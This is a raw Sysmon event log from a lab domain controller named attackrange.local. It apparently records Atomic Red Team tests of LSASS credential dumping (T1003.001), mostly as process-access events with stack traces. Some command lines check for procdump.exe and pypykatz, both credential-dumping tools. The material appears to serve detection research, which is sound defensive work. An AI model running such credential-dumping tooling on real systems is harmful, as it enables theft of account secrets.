21:10:05.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.346{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.280{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=85598C0D5AF3B460E88C0DF78CD7617C,SHA256=CFA377A67CF13D707F73DBE8A92D4DB306A8A1B3124A632D7AEF10E83D663EA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.248{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.245{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 